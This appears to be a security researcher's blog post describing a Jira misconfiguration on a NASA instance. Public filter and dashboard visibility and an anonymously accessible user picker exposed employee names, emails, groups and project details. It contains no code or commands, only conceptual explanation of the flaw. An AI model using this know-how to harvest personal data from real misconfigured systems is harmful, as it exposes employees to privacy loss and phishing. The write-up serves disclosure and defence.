Hi All,

Here, I’ll be talking about an interesting vulnerability that I have found in NASA Jira (An Atlassian task tracking systems/project management software etc.) or more specifically a misconfiguration issue which caused the leakage of internal sensitive information of NASA including their internal user details, project details, employee names, employees mail id etc. Let’s see what was the exact issue —

One of the biggest concerns of any company is ensuring that internal information is kept confidential and only available to specific individuals within and outside of an organisation. In other words by providing security, integrity and availability of their data (among another aspects), companies can sustain competitive advantage regarding their development plans, findings, talent employment etc.

There are a couple of settings in Jira that, when not configured properly, may disclose information about the application and its users and it can provide unauthorized access to some internal data of the companies to any other user over the internet. This information may aid an attacker in gaining access to the application.

In Jira, while creating filters or dashboards it provides some visibility option to set on them. The issue was due to the wrong permissions assigned to them. When the filters or dashboards are set the visibility to “All users” and “Everyone” respectively, which instead of sharing with everyone of the organization (which people interpret), it share them publically. There is also a user picker functionality in Jira which gives a complete list of every user’s username and email address. This information disclosure is the result of an authorization misconfiguration in Jira’s Global Permissions settings. Because of the wrong permissions scheme, the following internal information appeared to be vulnerable:

all account’s employees’ names and emails,

employees’ roles through JIRA groups,

current projects, upcoming milestones through JIRA dashboards/filters.

NASA User Details Exposed

I found that Jira instance used by NASA had a misconfigured setting where any anonymous user can access the user picker functionality (described as above) and pulls out the complete list of every NASA user’s username and email address.